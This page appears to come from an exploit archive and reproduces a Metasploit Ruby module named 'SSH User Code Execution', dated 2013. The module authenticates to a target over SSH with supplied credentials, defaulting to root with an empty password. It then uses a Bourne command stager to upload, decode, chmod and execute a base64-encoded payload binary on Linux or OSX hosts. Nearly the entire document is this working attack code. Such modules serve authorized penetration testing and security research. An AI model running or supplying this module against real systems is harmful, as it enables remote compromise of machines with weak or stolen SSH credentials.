SSH User Code Execution



EKU-ID: 3225 CVE: OSVDB-ID: 1999-0502
Author: Spencer McIntyre Published: 2013-05-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	include Msf::Exploit::CmdStagerBourne

	attr_accessor :ssh_socket

	def initialize
		super(
			'Name'        => 'SSH User Code Execution',
			'Description' => %q{
				This module utilizes a stager to upload a base64 encoded
				binary which is then decoded, chmod'ed and executed from
				the command shell.
			},
			'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
			'References'  =>
				[
					[ 'CVE', '1999-0502'] # Weak password
				],
			'License'     => MSF_LICENSE,
			'Privileged'  => true,
			'DefaultOptions' =>
				{
					'PrependFork' => 'true',
					'EXITFUNC' => 'process'
				},
			'Payload'     =>
				{
					'Space'    => 4096,
					'BadChars' => "",
					'DisableNops' => true
				},
			'Platform'    => [ 'osx', 'linux' ],
			'Targets'     =>
				[
					[ 'Linux x86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'linux'
						},
					],
					[ 'Linux x64',
						{
							'Arch' => ARCH_X86_64,
							'Platform' => 'linux'
						},
					],
					[ 'OSX x86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'osx'
						},
					],
				],
			'DefaultTarget'  => 0,
			# For the CVE
			'DisclosureDate' => 'Jan 01 1999'
		)

		register_options(
			[
				OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
				OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
				OptString.new('RHOST', [ true, "The target address" ]),
				Opt::RPORT(22)
			], self.class
		)

		register_advanced_options(
			[
				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
			]
		)
	end

	def execute_command(cmd, opts = {})
		begin
			Timeout.timeout(3) do
				self.ssh_socket.exec!("#{cmd}\n")
			end
		rescue ::Exception
		end
	end

	def do_login(ip, user, pass, port)
		opt_hash = {
			:auth_methods  => ['password', 'keyboard-interactive'],
			:msframework   => framework,
			:msfmodule     => self,
			:port          => port,
			:disable_agent => true,
			:password      => pass
		}

		opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

		begin
			self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
		rescue Rex::ConnectionError, Rex::AddressInUse
			fail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation')
		rescue Net::SSH::Disconnect, ::EOFError
			fail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation')
		rescue Net::SSH::AuthenticationFailed
			fail_with(Exploit::Failure::NoAccess, 'Failed authentication')
		rescue Net::SSH::Exception => e
			fail_with(Exploit::Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
		end

		if not self.ssh_socket
			fail_with(Exploit::Failure::Unknown)
		end
		return
	end

	def exploit
		do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])

		print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
		execute_cmdstager({:linemax => 500})
	end
end